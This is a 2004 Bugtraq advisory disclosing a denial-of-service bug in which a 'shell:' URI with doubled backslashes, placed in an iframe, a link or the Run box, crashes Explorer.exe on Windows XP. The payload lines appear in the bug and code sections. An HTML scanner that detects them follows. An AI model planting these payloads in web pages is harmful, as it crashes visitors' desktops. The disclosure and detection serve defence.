Internet Explorer Causing Explorer.exe - Null Pointer Crash

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 03/19/04

    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Fri, 19 Mar 2004 19:30:16 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Internet Explorer & Explorer.exe
    Vendors: http://www.microsoft.com
    Versions: Windows Xp Professional & Internet Explorer
    6.0.2600.0000.xpclnt_qfe.021108-2107
    Patched With: Q330994; Q822925; Q828750; Q824145;
    Platforms: WindowsXp
    Bug: Internet Explorer Causing Explorer.exe - Null Pointer
    Crash
    Risk: Medium - D.O.S
    Exploitation: Remote with browser
    Date: 19 Mar 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Windows XP is currently the most common operating system in the world.
    This product must be as safe as it is common.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    Lately a new function was discovered: "shell:". This function allows
    running some new functions remotely. There is a bug in Explorer.exe when
    accessing a filename with double backslash.

    For example, accessing any of the HTML tags below will cause Explorer to
    crash.
    <iframe src=shell:windows\\system32\\calc.exe></iframe>
    Or
    <a href=shell:windows\\system32\\calc.exe></a>
    Or
    Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

    Explorer.exe crashes when using "\\".
    "\" doesn't crash it and even %5C%5C doesn't crash it.

    There is a registry key which is turned on by default. This key
    automatically restarts "Explorer.exe". If this key is set to "0",
    Explorer.exe will not restart.

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "AutoRestartShell"=dword:00000001

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    <iframe src=shell:windows\\system32\\calc.exe></iframe>
    Or
    <a href=shell:windows\\system32\\calc.exe></a>
    Or
    Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com

    "Things that are unlikeable, are NOT impossible."
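The shell: references described in the post, looked at from the filtering side: an added example (not code from the original post) that walks HTML with Python's html.parser, collects every shell: URI in a navigation attribute, and separates out the ones carrying the doubled backslash the post reports as the crash trigger. The sample HTML is constructed for the example.

```python
"""Find "shell:" URIs in HTML navigation attributes and flag the
doubled-backslash form reported above as crashing Explorer.exe.
Added example for a content filter or proxy check; not from the post."""
from html.parser import HTMLParser

# Attributes Internet Explorer resolves as navigation targets.
URL_ATTRS = {"src", "href", "action", "data"}


class ShellUriFinder(HTMLParser):
    """Collect (tag, attribute, value) for every shell: URI seen."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names for us.
        for name, value in attrs:
            if value is None or name not in URL_ATTRS:
                continue
            value = value.strip()
            if value.lower().startswith("shell:"):
                self.hits.append((tag, name, value))


def scan_html(html):
    """Return a dict with all shell: URIs and the subset containing '\\\\'.

    The post reports the literal double backslash as the crash trigger and
    says a single backslash and the %5C%5C encoding do not crash Explorer,
    so only the literal "\\\\" form goes into 'double_backslash'."""
    parser = ShellUriFinder()
    parser.feed(html)
    parser.close()
    return {
        "shell_uris": parser.hits,
        "double_backslash": [h for h in parser.hits if "\\\\" in h[2]],
    }


# Constructed sample: one unquoted double-backslash iframe (the form from
# the post), one single-backslash link, one ordinary http link.
SAMPLE_HTML = r"""<html><body>
<iframe src=shell:windows\\system32\\calc.exe></iframe>
<a href="shell:windows\system32\calc.exe">single</a>
<a href="http://example.invalid/page">normal</a>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, uri in scan_html(SAMPLE_HTML)["double_backslash"]:
        print(f"double-backslash shell: URI in <{tag} {attr}>: {uri}")
```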

